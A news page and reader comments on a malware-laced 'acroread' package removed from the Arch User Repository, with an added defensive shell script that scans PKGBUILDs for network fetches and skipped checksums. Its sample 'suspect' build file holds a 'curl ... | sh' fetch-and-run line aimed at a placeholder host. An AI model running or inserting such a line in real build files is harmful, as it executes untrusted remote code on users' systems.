Arch Linux PDF reader package poisoned

Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware. If you're an Arch Linux user who downloaded a PDF viewer named "acroread" in the short time it was compromised, you'll need to delete it. While the breach isn't regarded as serious, it sparked a debate about the security of …

Gold badge
Unhappy

If you leave stuff by the side of the information superhighway someone will pick it up.

Who knew?

9
1
Reply

ArchLinux AUR

As an Arch user I am well aware of the potential dangers in installing software from the user-maintained repo (AUR), and I would hope that this is the case for other users too. It's pretty simple to check the installation script before running it. The advantages of having access to this repo outweigh the dangers; it just needs using with respect.

In general, any non-moderated repo offers this risk; it certainly is not limited to Arch.

21
0
Reply
WTF?

What, you want me to stop building packages as root using AUR helpers?

And reading every pkgbuild file? Sure, it will be more fun than reading every EULA for non-free software.

But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

17
0
Reply

Re: What, you want me to stop building packages as root using AUR helpers?

But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

Just like what he did here. He put the malicious code in a script retrieved from the Internet.

What if you have a package that retrieves "additional data" from the Internet, not only a script?

Like a game retrieving its assets for example.

Should every single byte it downloads be checked?

6
0
Reply
Bronze badge
Facepalm

The internet

Was a far better place in the 90's

Then the masses of muppets came, and with them, the sociopaths

11
9
Reply
hmv

Re: The internet

The Morris worm was in 1988, and there were certainly many bad actors in the 1990s - my introduction to security was finding out why an AlphaServer 2100 was running a bit slow, and discovering it was riddled with nasty stuff.

8
0
Reply
Anonymous Coward

A dodgy acroread package? I'm shocked, I tell you!

A dodgy acroread package? It sounds as though it has replicated the functionality of the Adobe original quite accurately...

26
0
Reply
Anonymous Coward

Re: A dodgy acroread package? I'm shocked, I tell you!

No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe Linux developers...

0
5
Reply
Holmes

Re: A dodgy acroread package? I'm shocked, I tell you!

Re: A dodgy acroread package? I'm shocked, I tell you!

No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe ̶L̶i̶n̶u̶x̶ developers...

---

Fixed!

0
0
Reply
Silver badge

To contrast that...

I have seen multiple Windows users looking for software by going to google and typing "$product free download" into it...

Yes, that's apparently still the norm for large numbers of people. BTW if you come across one of those, tell them to go to the Wikipedia page for that product (yes there are still people not knowing Wikipedia) and tell them to follow the link to the website of the manufacturer. That's much better security wise. (though not perfect)

6
0
Reply
Bronze badge
Alert

Thank Goodness it's Not One of the "Major" Distributions

I don't know how many Arch servers there are out there; and thankfully, this was not a server package.

We have seriously got to protect the repos!!! PERIOD!!!

I'll leave it up to others to elaborate.

1
2
Reply

Re: Thank Goodness it's Not One of the "Major" Distributions

This wasn't a main repository. It's an external repository for user-submitted software. Users have to either:

A) Download the build file manually and follow some steps to build the software

or

B) Install an extra package manager to automate performing A.

I still think there are some interesting lessons to be learned here, though. It might be useful for AUR pages and AUR helpers to highlight when there's been a maintainer change, or allow you to easily view the diff for the build file. I know that that information is currently available on the AUR pages themselves, but making it super obvious when changes like that have occurred would be helpful.

1
0
Reply
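The two habits this comment and the earlier ones describe (read the build file before running it, and look at what changed since the last version) can be partly automated. The following shell script is an added example, not code from The Register, from the commenters, or from Arch's own tooling: it scans a PKGBUILD for the pattern the thread describes, a `prepare()`/`build()`/`package()` step that fetches something from the network outside the declared `source=()` array, and for checksum slots left as `SKIP`, which means that source is never verified. The two sample PKGBUILDs it writes are constructed for the example; the `example.invalid` URLs and the zero checksum are placeholders, and the package name is reused only because the article names it.

```bash
#!/bin/sh
# Added example, not code from the article or from Arch/AUR tooling.
# A minimal pre-build check for a PKGBUILD: count network fetches inside
# prepare()/build()/package() and checksum entries set to SKIP.

# Number of lines inside prepare()/build()/package() that call a network client.
fetch_in_functions() {
    awk '
        /^(prepare|build|package)[ ]*\(\)/ { infn = 1; next }
        infn && /^}/                        { infn = 0; next }
        infn && /(curl|wget|git clone)/      { n++ }
        END { print n + 0 }
    ' "$1"
}

# Number of checksum slots that are SKIP, i.e. sources that are never verified.
skip_checksums() {
    grep -cE "sums=.*SKIP|^[[:space:]]*'SKIP'" "$1" || true
}

# Prints a one-line summary; returns 0 only when nothing was flagged.
audit_pkgbuild() {
    fetches=$(fetch_in_functions "$1")
    skips=$(skip_checksums "$1")
    if [ "$fetches" -eq 0 ] && [ "$skips" -eq 0 ]; then
        echo "$1: OK (no in-function fetches, all sources checksummed)"
        return 0
    fi
    echo "$1: REVIEW (fetches in build functions: $fetches, SKIP checksums: $skips)"
    return 1
}

# Writes two constructed PKGBUILDs into a temp directory and prints its path.
# The URLs, checksum and version numbers are placeholders, not real values.
make_samples() {
    dir=$(mktemp -d)
    cat > "$dir/PKGBUILD.clean" <<'EOF'
pkgname=acroread
pkgver=9.5.5
pkgrel=1
source=("https://example.invalid/acroread-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
    install -Dm755 "$srcdir/acroread" "$pkgdir/usr/bin/acroread"
}
EOF
    cat > "$dir/PKGBUILD.suspect" <<'EOF'
pkgname=acroread
pkgver=9.5.5
pkgrel=8
source=("https://example.invalid/acroread-$pkgver.tar.gz"
        "https://example.invalid/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
package() {
    install -Dm755 "$srcdir/acroread" "$pkgdir/usr/bin/acroread"
    curl -s https://example.invalid/extra.sh | sh
}
EOF
    echo "$dir"
}

# Usage demo: the non-zero return from the suspect file is ignored here so the
# script itself exits cleanly after printing both verdicts.
samples=$(make_samples)
audit_pkgbuild "$samples/PKGBUILD.clean" || true
audit_pkgbuild "$samples/PKGBUILD.suspect" || true
```

The check is deliberately coarse: a flagged file is a prompt to read the diff against the previous revision, not a verdict, and a clean result only says the build functions do not obviously fetch anything and that every declared source has a checksum to be verified against.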
Anonymous Coward

Butt butt Lunix is secure! Windoze Micro$oft blah blah blah...

3
14
Reply
Anonymous Coward

"Butt butt Lunix is secure!"

That's quite a statement for an OS that ran on the C64 with TCP/IP support and is no longer maintained.

1
0
Reply
Bronze badge

Linux is the Kernal

I don't remember hearing about the kernel ever being infected. I still worry about the repos--given how automatically an entire system can be updated.

1
0
Reply

Much as I love the AUR (and have successfully made use of lots of packages from it), I've always been a little concerned about its 'ports'-like nature: it's all well and good it being more convenient than downloading a src tarball, but I have no idea what it's pulling from those links (knowing that it's getting file abc from site xyz.somewhere doesn't give me any insight into the code itself, and for all I know the src files it dumps on my system have nothing in common with what actually gets compiled - how many bits of linked-out code get added without downloading a corresponding patch file?).

Despite my sense of Gentoo being all hype and no trousers (it's not (B)LFS and setting and forgetting a few compile time switches is not 'compiling your own linux'), I may have to switch to it for peace of mind (just as soon as I can afford a second, identical, system on which to spend all day compiling that is *sigh*).

0
0
Reply
Bronze badge

Halo effect

Don't blame the Arch team for any of this, in fact I give them credit - but inevitably there is a halo around the core distro (any core distro) that extends to anything that is considered "close" to it. So the very fact that AURs start at aur.archlinux.org and not aur.example.com gives AUR an (undeserved) halo of respectability. Yes I know it doesn't deserve it and the page says you try at your own risk. But the halo effect is incredibly strong. It's why people still click on phishing emails from Microsoft Support.

2
0
Reply


Biting the hand that feeds IT © 1998–2018